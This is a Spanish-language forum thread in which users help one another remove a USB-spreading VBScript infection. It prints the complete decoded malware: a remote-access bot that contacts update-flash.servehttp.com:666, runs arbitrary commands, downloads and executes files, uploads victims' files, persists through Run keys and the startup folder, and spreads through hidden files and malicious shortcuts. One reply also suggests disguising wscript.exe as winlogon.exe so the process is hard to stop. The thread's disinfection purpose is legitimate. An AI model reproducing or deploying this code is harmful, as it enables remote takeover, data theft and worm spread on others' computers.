vKSB0aGVuDQogICBzaGVsbG9iai5ydW4gb2JqZnNvZG93bmxvYWQuZ2V0ZmlsZSAoc3Ryc2F2ZXRvKS5zaG9ydHBhdGgNCmVuZCBpZiANCmVuZCBzdWINCg0Kc3ViIGRvd25sb2FkIChmaWxldXJsLGZpbGVkaXIpDQoNCmlmIGZpbGVkaXIgPSAiIiB0aGVuIA0KICAgZmlsZWRpciA9IGluc3RhbGxkaXINCmVuZCBpZg0KDQpzdHJzYXZldG8gPSBmaWxlZGlyICYgbWlkIChmaWxldXJsLCBpbnN0cnJldiAoZmlsZXVybCwiXCIpICsgMSkNCnNldCBvYmpodHRwZG93bmxvYWQgPSBjcmVhdGVvYmplY3QoIm1zeG1sMi54bWxodHRwIikNCm9iamh0dHBkb3dubG9hZC5vcGVuICJwb3N0IiwiaHR0cDovLyIgJiBob3N0ICYgIjoiICYgcG9ydCAmIi8iICYgImlzLXNlbmRpbmciICYgc3BsaXRlciAmIGZpbGV1cmwsIGZhbHNlDQpvYmpodHRwZG93bmxvYWQuc2VuZCAiIg0KICAgICANCnNldCBvYmpmc29kb3dubG9hZCA9IGNyZWF0ZW9iamVjdCAoInNjcmlwdGluZy5maWxlc3lzdGVtb2JqZWN0IikNCmlmICBvYmpmc29kb3dubG9hZC5maWxlZXhpc3RzIChzdHJzYXZldG8pIHRoZW4NCiAgICBvYmpmc29kb3dubG9hZC5kZWxldGVmaWxlIChzdHJzYXZldG8pDQplbmQgaWYNCmlmICBvYmpodHRwZG93bmxvYWQuc3RhdHVzID0gMjAwIHRoZW4NCiAgICBkaW0gIG9ianN0cmVhbWRvd25sb2FkDQoJc2V0ICBvYmpzdHJlYW1kb3dubG9hZCA9IGNyZWF0ZW9iamVjdCgiYWRvZGIuc3RyZWFtIikNCiAgICB3aXRoIG9ianN0cmVhbWRvd25sb2FkIA0KCQkgLnR5cGUgPSAxIA0KCQkgLm9wZW4NCgkJIC53cml0ZSBvYmpodHRwZG93bmxvYWQucmVzcG9uc2Vib2R5DQoJCSAuc2F2ZXRvZmlsZSBzdHJzYXZldG8NCgkJIC5jbG9zZQ0KCWVuZCB3aXRoDQogICAgc2V0IG9ianN0cmVhbWRvd25sb2FkICA9IG5vdGhpbmcNCmVuZCBpZg0KaWYgb2JqZnNvZG93bmxvYWQuZmlsZWV4aXN0cyhzdHJzYXZldG8pIHRoZW4NCiAgIHNoZWxsb2JqLnJ1biBvYmpmc29kb3dubG9hZC5nZXRmaWxlIChzdHJzYXZldG8pLnNob3J0cGF0aA0KZW5kIGlmIA0KZW5kIHN1Yg0KDQoNCmZ1bmN0aW9uIHVwbG9hZCAoZmlsZXVybCkNCg0KZGltICBodHRwb2JqLG9ianN0cmVhbXVwbG9hZGUsYnVmZmVyDQpzZXQgIG9ianN0cmVhbXVwbG9hZGUgPSBjcmVhdGVvYmplY3QoImFkb2RiLnN0cmVhbSIpDQp3aXRoIG9ianN0cmVhbXVwbG9hZGUgDQogICAgIC50eXBlID0gMSANCiAgICAgLm9wZW4NCgkgLmxvYWRmcm9tZmlsZSBmaWxldXJsDQoJIGJ1ZmZlciA9IC5yZWFkDQoJIC5jbG9zZQ0KZW5kIHdpdGgNCnNldCBvYmpzdHJlYW1kb3dubG9hZCA9IG5vdGhpbmcNCnNldCBodHRwb2JqID0gY3JlYXRlb2JqZWN0KCJtc3htbDIueG1saHR0cCIpDQpodHRwb2JqLm9wZW4gInBvc3QiLCJodHRwOi8vIiAmIGhvc3QgJiAiOiIgJiBwb3J0ICYiLyIgJiAiaXMtcmVjdmluZyIgJiBzcGxpdGVyICYgZmlsZXVybCwgZmFsc2UNCmh0dHBvYmouc2VuZCBidWZmZXINCmVuZCBmdW5jdGlvbg0KDQoNCmZ1bmN0aW9uIGVudW1kcml2ZXIgKCkNCg0KZm9yICBlYWNoIGRyaXZlIGluIGZpbGVzeXN0ZW1vYmouZHJpdmVzDQppZiAgIGRyaXZlLmlzcmVhZHkgPSB0cnVlIHRoZW4NCiAgICAgZW51bWRyaXZlciA9IGVudW1kcml2ZXIgJiBkcml2ZS5wYXRoICYgInwiICYgZHJpdmUuZHJpdmV0eXBlICYgc3BsaXRlcg0KZW5kIGlmDQpuZXh0DQplbmQgRnVuY3Rpb24NCg0KZnVuY3Rpb24gZW51bWZhZiAoZW51bWRpcikNCg0KZW51bWZhZiA9IGVudW1kaXIgJiBzcGxpdGVyDQpmb3IgIGVhY2ggZm9sZGVyIGluIGZpbGVzeXN0ZW1vYmouZ2V0Zm9sZGVyIChlbnVtZGlyKS5zdWJmb2xkZXJzDQogICAgIGVudW1mYWYgPSBlbnVtZmFmICYgZm9sZGVyLm5hbWUgJiAifCIgJiAiIiAmICJ8IiAmICJkIiAmICJ8IiAmIGZvbGRlci5hdHRyaWJ1dGVzICYgc3BsaXRlcg0KbmV4dA0KDQpmb3IgIGVhY2ggZmlsZSBpbiBmaWxlc3lzdGVtb2JqLmdldGZvbGRlciAoZW51bWRpcikuZmlsZXMNCiAgICAgZW51bWZhZiA9IGVudW1mYWYgJiBmaWxlLm5hbWUgJiAifCIgJiBmaWxlLnNpemUgICYgInwiICYgImYiICYgInwiICYgZmlsZS5hdHRyaWJ1dGVzICYgc3BsaXRlcg0KDQpuZXh0DQplbmQgZnVuY3Rpb24NCg0KDQpmdW5jdGlvbiBlbnVtcHJvY2VzcyAoKQ0KDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KDQpzZXQgb2Jqd21pc2VydmljZSA9IGdldG9iamVjdCgid2lubWdtdHM6XFwuXHJvb3RcY2ltdjIiKQ0Kc2V0IGNvbGl0ZW1zID0gb2Jqd21pc2VydmljZS5leGVjcXVlcnkoInNlbGVjdCAqIGZyb20gd2luMzJfcHJvY2VzcyIsLDQ4KQ0KDQpkaW0gb2JqaXRlbQ0KZm9yIGVhY2ggb2JqaXRlbSBpbiBjb2xpdGVtcw0KCWVudW1wcm9jZXNzID0gZW51bXByb2Nlc3MgJiBvYmppdGVtLm5hbWUgJiAifCINCgllbnVtcHJvY2VzcyA9IGVudW1wcm9jZXNzICYgb2JqaXRlbS5wcm9jZXNzaWQgJiAifCINCiAgICBlbnVtcHJvY2VzcyA9IGVudW1wcm9jZXNzICYgb2JqaXRlbS5leGVjdXRhYmxlcGF0aCAmIHNwbGl0ZXINCm5leHQNCmVuZCBmdW5jdGlvbg0KDQpzdWIgZXhpdHByb2Nlc3MgKHBpZCkNCm9uIGVycm9yIHJlc3VtZSBuZXh0DQoNCnNoZWxsb2JqLnJ1biAidGFza2tpbGwgL0YgL1QgL1BJRCAiICYgcGlkLDcsdHJ1ZQ0KZW5kIHN1Yg0KDQpzdWIgZGVsZXRlZmFmICh1cmwpDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KDQpmaWxlc3lzdGVtb2JqLmRlbGV0ZWZpbGUgdXJsDQpmaWxlc3lzdGVtb2JqLmRlbGV0ZWZvbGRlciB1cmwNCg0KZW5kIHN1Yg0KDQpmdW5jdGlvbiBjbWRzaGVsbCAoY21kKQ0KDQpkaW0gaHR0cG9iaixvZXhlYyxyZWFkYWxsZnJvbWFueQ0KDQpzZXQgb2V4ZWMgPSBzaGVsbG9iai5leGVjICgiJWNvbXNwZWMlIC9jICIgJiBjbWQpDQppZiBub3Qgb2V4ZWMuc3Rkb3V0LmF0ZW5kb2ZzdHJlYW0gdGhlbg0KICAgcmVhZGFsbGZyb21hbnkgPSBvZXhlYy5zdGRvdXQucmVhZGFsbA0KZWxzZWlmIG5vdCBvZXhlYy5zdGRlcnIuYXRlbmRvZnN0cmVhbSB0aGVuDQogICByZWFkYWxsZnJvbWFueSA9IG9leGVjLnN0ZGVyci5yZWFkYWxsDQplbHNlIA0KICAgcmVhZGFsbGZyb21hbnkgPSAiIg0KZW5kIGlmDQoNCmNtZHNoZWxsID0gcmVhZGFsbGZyb21hbnkNCmVuZCBmdW5jdGlvbg==") EXECUTEGLOBAL (ABC) function deCrypt(data) deCrypt=YYY(data) end function Function YYY(ByVal base64String) Const ZZZ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") dataLength = Len(base64String) If dataLength Mod 4 <> 0 Then Err.Raise 1, "Base64Decode", "Bad Base64 string." Exit Function End If For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, ZZZ, thisChar, vbBinaryCompare) - 1 End If
El contenido del "virus" está cifrado de nuevo con Base64, he añadido el siguiente código para descifrarlo: Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile("dump2.txt", True) a.WriteLine(ABC) a.Close
Y el resultado final es el "virus" completamente descifrado, el análisis te lo dejo para ti (o para otro usuario): '<[ recoder : houdini (c) skype : houdini-fx ]> '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= host = "update-flash.servehttp.com" port = 666 installdir = "%temp%" lnkfile = true lnkfolder = true '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-= dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp") '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-= installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<" & "|" & ">" sleep = 5000 dim response dim cmd dim param info = "" usbspreading = "" startdate = "" dim oneonce '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-= on error resume next instance while true install response = "" response = post ("is-ready","") cmd = split (response,spliter) select case cmd (0) case "excecute" param = cmd (1) execute param case "update" param = cmd (1) oneonce.close set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false) oneonce.write param oneonce.close shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) wscript.quit case "uninstall" uninstall case "send" download cmd (1),cmd (2) case "site-send" sitedownloader cmd (1),cmd (2) case "recv" param = cmd (1) upload (param) case "enum-driver" post "is-enum-driver",enumdriver case "enum-faf" param = cmd (1) post "is-enum-faf",enumfaf (param) case "enum-process" post "is-enum-process",enumprocess case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param) case "delete" param = cmd (1) deletefaf (param) case "exit-process" param = cmd (1) exitprocess (param) case "sleep" param = cmd (1) sleep = eval (param) end select wscript.sleep sleep wend sub install on error resume next dim lnkobj dim filename dim foldername dim fileicon dim foldericon upstart for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true if filesystemobj.fileexists (drive.path & "\" & installname) then filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4 end if for each file in filesystemobj.getfolder( drive.path & "\" ).Files if not lnkfile then exit for if instr (file.name,".") then if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 2+4 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 then lnkobj.iconlocation = file.path else lnkobj.iconlocation = fileicon end if lnkobj.save() end if end if end if next for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders if not lnkfolder then exit for folder.attributes = 2+4 foldername = folder.name set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit" foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") if instr (foldericon,",") = 0 then lnkobj.iconlocation = folder.path else lnkobj.iconlocation = foldericon end if lnkobj.save() next end If end If end if next err.clear end sub sub uninstall on error resume next dim filename dim foldername shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then for each file in filesystemobj.getfolder ( drive.path & "\").files on error resume next if instr (file.name,".") then if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 0 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" ) else filesystemobj.deletefile (drive.path & "\" & file.name) end If else filesystemobj.deletefile (file.path) end if end if next for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders folder.attributes = 0 next end if end if end if next wscript.quit end sub function post (cmd ,param) post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end function function information on error resume next if inf = "" then inf = hwid & spliter inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set os = root.execquery ("select * from win32_operatingsystem") for each osinfo in os inf = inf & osinfo.caption & spliter exit for next inf = inf & "plus" & spliter inf = inf & security & spliter inf = inf & usbspreading information = inf else information = inf end if end function sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub function hwid on error resume next set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disks if disk.volumeserialnumber <> "" then hwid = disk.volumeserialnumber exit for end if next end function function security on error resume next security = "" set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitems versionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for x = 1 to ubound (versionstr) osversion = osversion & versionstr (i) next osversion = eval (osversion) if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter" set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0) for each objantivirus in colantivirus security = security & objantivirus.displayname & " ." next if security = "" then security = "nan-av" end function function instance on error resume next usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") if usbspreading = "" then if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then usbspreading = "true - " & date shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" else usbspreading = "false - " & date shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" end if end If upstart set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort = filesystemobj.getfile (installdir & installname) if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if err.number > 0 then wscript.quit end function sub sitedownloader (fileurl,filename) strlink = fileurl strsaveto = installdir & filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) then shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub sub download (fileurl,filedir) if filedir = "" then filedir = installdir end if strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send "" set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) then shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub function upload (fileurl) dim httpobj,objstreamuploade,buffer set objstreamuploade = createobject("adodb.stream") with objstreamuploade .type = 1 .open .loadfromfile fileurl buffer = .read .close end with set objstreamdownload = nothing set httpobj = createobject("msxml2.xmlhttp") httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false httpobj.send buffer end function function enumdriver () for each drive in filesystemobj.drives if drive.isready = true then enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter end if next end Function function enumfaf (enumdir) enumfaf = enumdir & spliter for each folder in filesystemobj.getfolder (enumdir).subfolders enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter next for each file in filesystemobj.getfolder (enumdir).files enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter next end function function enumprocess () on error resume next set objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process",,48) dim objitem for each objitem in colitems enumprocess = enumprocess & objitem.name & "|" enumprocess = enumprocess & objitem.processid & "|" enumprocess = enumprocess & objitem.executablepath & spliter next end function sub exitprocess (pid) on error resume next shellobj.run "taskkill /F /T /PID " & pid,7,true end sub sub deletefaf (url) on error resume next filesystemobj.deletefile url filesystemobj.deletefolder url end sub function cmdshell (cmd) dim httpobj,oexec,readallfromany set oexec = shellobj.exec ("%comspec% /c " & cmd) if not oexec.stdout.atendofstream then readallfromany = oexec.stdout.readall elseif not oexec.stderr.atendofstream then readallfromany = oexec.stderr.readall else readallfromany = "" end if cmdshell = readallfromany end function
Título: Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Flamer en 16 Octubre 2013, 21:59 pm
Ya me lo esperaba similar a la muestra que tengo del virus help.vbs La unica diferencia que se conecta a otro servidor y puerto.
Lo que le falto a este y al otro que tengo es que creara nombres aleatorios al copiarse a la USB y crearse un proceso wscript inmortal.
Saludos flamer
Título: Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Mad Antrax en 16 Octubre 2013, 22:16 pm
Bueno, visto que nadie se ha animado, me dispongo a realizar yo mismo el análisis de éste "virus". Es algo parecido a una botnet, el virus infecta el equipo y espera recibir ordenes y acciones que atacante emite a través de una web. El virus "escucha" las acciones que debe ejecutar en el PC infectado consultando la siguiente url: update-flash.servehttp.com:666 Se instala en la startupfolder, por ejemplo: C:\Users\%USER%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\virus.vbs El virus manda el comando "is-ready" para decirle al atacante que ya está instalado y a la espera de ejecutar ordenes. El atacante puede emitir los siguientes comandos: case "excecute" case "update" case "uninstall" case "send" case "site-send" case "recv" case "enum-driver" case "enum-faf" case "enum-process" case "cmd-shell" case "delete" case "exit-process" case "sleep" El nombre de cada comando es bastante significativo, y me llama la atención el comando "unistall". Si el programador lo ha hecho bien, ejecuta manualmente la función "unistall" y deberás quedar desinfectado de éste virus de forma automática, una forma de hacerlo es ejecutando el siguiente código VBS: host = "update-flash.servehttp.com" port = 666 installdir = "%temp%" lnkfile = true lnkfolder = true dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp") '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-= installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<" & "|" & ">" sleep = 5000 dim response dim cmd dim param info = "" usbspreading = "" startdate = "" dim oneonce '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-= on error resume next dim filename dim foldername shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then for each file in filesystemobj.getfolder ( drive.path & "\").files on error resume next if instr (file.name,".") then if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 0 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" ) else filesystemobj.deletefile (drive.path & "\" & file.name) end If else filesystemobj.deletefile (file.path) end if end if next for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders folder.attributes = 0 next end if end if end if next msgbox "desinfectado" wscript.quit
Dime si te ha funcionado. Saludos!! :D
Título: Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Flamer en 16 Octubre 2013, 22:59 pm
Bueno el proceso inmortal es con el metodo de karcrack. Ya que si tenemos un vbscript ciclado se puede finalisar matando el proceso wscript.exe asi que para que no puedan matar el proceso copeas el archivo wscript.exe y lo aguardas con el nombre winlogon.exe y ejecutas el virus asi cada ves que prenda la maquina. winlogon virus.vbs
saludos flamer y espero que les guste esta idea la tenia debajo de la manga
Título: Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: TheChivo en 17 Octubre 2013, 04:22 am
Hola ||MadAntrax|| ! Gracias por tu analisis y ayuda! La verdad no crei que a menos de 24 horas de mi publicacion alguien ya hubiera analizado y descifrado el codigo, y, lo que es mas, ¡entregar una solución para este! No se si funcione, aunque le tengo bastante fé, aun asi, publico esto antes de prbarlo, si n hay respuesta... es que el sistema falló y tuve que reformatear XD, espero dentro de pronto poder postear un mensaje que diga "Ya quedo!", pero de mmenoto, vamos a hacer pruebas, vuelvo en un rato a decir como me fue.
Flamer: La verdad intente entender lo que escribiste... pero no le haye mucho sentido, o me desincronize de lo que quieres decir o te equivocaste de post (creo mas bien que es lo primero, pero quien sabe) aun asi gracias por tu colaboracion n_n.
--------------------Edito------------
||MadAntrax||, Muchas Gracias! Tu script me ha servido de mucho para deshacerme (al menos sintomaticamente) de ese molesto "virus", Ya no me crea iconos de acceso directo, ya no se reproduce a si mismo en las memorias que conecto y tampoco oculata los archivos de mis USB. Muchas, pero de verdad muchas muchas gracias por tu ayuda. Te debo 1 n_n.
Te envio un abrazo desde México. Salu2 y de nuevo Gracias n_n!
-----------------Edito------------
Aparentemente esta cosa es un hueso duro de roer, parecia haberme librado de el, pero aparece nuevamente, a pesar de haber utilizado el script que proporcionó ||MadAntrax||. Seguiré viendo a ver que encuentro, aun asi, gracias por la ayuda ||MadAntrax|| Al menos ahora se que hace ytengo una guia para proceder a eliminarlo.
Salu2 n_n
-------------- Otra edicion mas XD ---------
Pues, aparentemente ya quedó, si a alguien le pasa lo que hice fue lo siguiente: 1.- Ir al administrador de tareas y terminar el o los proceso/s "wscript.exe - Microsoft (r) Windows Based Script Host" 2.- Ejecutar en las USB's Infectadas el script cortesia de ||MadAntrax|| (si ninguna USB ha sido infectada o no se dispone de ninguna, ejecutarlo desde el escritorio o una subcarpeta cualquiera) 3.- Ir al administrador de Aranque de windows (El famoso "msconfig.exe") e ir a la sección de "inicio de windows" (en mi caso, por ser W8 esta opcion esta en el "administrador de tareas" en la pestaña "Inicio") 4.- Deshabilitar el inicio de todos los procesos "Microsoft (r) Windows Based Script Host" (estos ultimos 2 pasos tambien pueden hacerce con herramientas como "CCleaner" que tambien permite borrar la clave, ya que reinicie lo haré) 5.- Reiniciar. Si todo va bien ya no deberia presentar problemas, al menos a mi, ya no me dio n_n.
Nuevamente agradezco a ||MadAntrax|| quien hizo gran parte del trabajo aqui (Si no es que todo :P)
Salu2! :D ;D :xD ;-)
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: hero4th en 18 Octubre 2013, 01:16 am
Pues, aparentemente ya quedó, si a alguien le pasa lo que hice fue lo siguiente: 1.- Ir al administrador de tareas y terminar el o los proceso/s "wscript.exe - Microsoft (r) Windows Based Script Host" 2.- Ejecutar en las USB's Infectadas el script cortesia de ||MadAntrax|| (si ninguna USB ha sido infectada o no se dispone de ninguna, ejecutarlo desde el escritorio o una subcarpeta cualquiera) 3.- Ir al administrador de Aranque de windows (El famoso "msconfig.exe") e ir a la sección de "inicio de windows" (en mi caso, por ser W8 esta opcion esta en el "administrador de tareas" en la pestaña "Inicio") 4.- Deshabilitar el inicio de todos los procesos "Microsoft (r) Windows Based Script Host" (estos ultimos 2 pasos tambien pueden hacerce con herramientas como "CCleaner" que tambien permite borrar la clave, ya que reinicie lo haré) 5.- Reiniciar. Si todo va bien ya no deberia presentar problemas, al menos a mi, ya no me dio n_n.
Nuevamente agradezco a ||MadAntrax|| quien hizo gran parte del trabajo aqui (Si no es que todo :P)
Salu2! :D ;D :xD ;-)
TheChivo Acabo de adquirir el mismo virus, y tristemente mi antivirus (norton 64) no lo detecta. Quise seguir tus instrucciones para eliminar el virus pero no soy programador y no estoy familiarizado con visual basic o c++, por lo que no sé cómo correr el código en la usb. ¿Cómo corro el código en las usb infectadas? debo crear algún tipo de archivo visual basic? Otra pregunta, supongo que no sirve de nada eliminar el archivo fyzbnaksvu..vbs de la carpeta de startup, mi pregunta es, ¿si lo elimino podré utilizar otras usb? que me sugieres. Te agradezco tu tiempo y atención TheChivo. Gracias
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: TheChivo en 18 Octubre 2013, 09:38 am
El codigo publicado por ||MadAntrax|| copialo, lo pegas en un bloc de notas y lo guardas como "mataxyz.vbs" con todo y comillas, esto te generará un script llamado mataxyz.vbs que tendra como icono un pergamino (en si el nombre "mataxyz" puede ser lo que quieras, solo asegurate que acabe con .vbs y que este encerrado en comillas).
Te recomiendo crear mas de 1 copia de ese archivito porque una vez que se usa se borra a si mismo.
Copia el archivito mataxyz.vbs a la usb y de ahi o corres, asegurate que, antes de hacerlo, el proceso wscript.exe no se esté ejecutando o si nó el "virus" reaparecerá practicamente al instante.
Cualquier duda pregunta, que para eso esta el foro :P XD
Salu2 y exito!
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: hero4th en 18 Octubre 2013, 18:52 pm
Bien, creo que tambien ya quedo, tenía una usb infectada y ahora ya no muestra el virus ni cambia las carpetas por accesos directos, solo tengo 2 preguntas mas TheChivo. -El virus sigue estando en la carpeta de "Inicio", ¿lo elimino? y si no elimino -Aunque siga en mi computadora ¿no tendra efecto secundarios como infectar otra usb o dañar otros archivos de mi sistema operativo?
Gracias por tu ayuda.
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: TheChivo en 19 Octubre 2013, 09:08 am
Bien, creo que tambien ya quedo, tenía una usb infectada y ahora ya no muestra el virus ni cambia las carpetas por accesos directos, solo tengo 2 preguntas mas TheChivo. -El virus sigue estando en la carpeta de "Inicio", ¿lo elimino? y si no elimino -Aunque siga en mi computadora ¿no tendra efecto secundarios como infectar otra usb o dañar otros archivos de mi sistema operativo?
Gracias por tu ayuda.
